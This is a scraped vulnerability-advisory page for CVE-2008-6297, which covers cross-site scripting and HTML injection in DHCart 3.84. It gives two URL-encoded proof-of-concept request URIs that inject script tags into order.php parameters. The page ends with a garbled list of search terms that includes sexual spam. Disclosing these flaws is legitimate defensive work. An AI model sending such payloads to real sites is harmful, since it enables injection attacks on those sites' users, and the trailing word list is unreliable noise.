about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , DHCart Multiple Cross Site Scripting And HTML Injection Vulnerabilities


Title DHCart Multiple Cross Site Scripting And HTML Injection Vulnerabilities
Published 2008-11-04-12:00AM
Updated 2009-03-06-07:16PM
Class Input Validation Error
CVE   CVE-2008-6297
Remote  Yes
Local  No
Credit  Lostmon
Vulnerable  DHCart DHCart 3.84
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available:http://www.example.com/order.php?dhaction=check&submit_domain=Register&domain=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&ext1=onhttp://www.example.com/order.php?dhaction=add&d1=lalalalasss%22%3E%3Cscript%3Ealert(1)%3C/script%3E&x1=.com&r1=0&h1=1&addtocart1=on&n=3
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 00:30:53 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
all ...om_ mysmartbb Sendmail 8 www.80845. zero-lengt www.sdjhti indai sex Sexcy ram Maduredece asinimages 200 /compo freeanimal www.lalats addguest.h PHP Advanc PHP Advanc Powered b Www.inders WWW SEX.18 Sexcy ram wap.phon Xxxindan eklogin MicrosoRe sexymovie eklogin wap.phon sexymovie AFGHANSEXT nmap joomla 1.8 Sex boys i sex tv1 ch Knowledge /search/ex www.jnding www.jnding CMS is Fre t963t gunpheng@l indianscho news for c Sex girl f www.taoke1 Mika tru64 news for c snehasexvi maxcpm.inf www.gerlet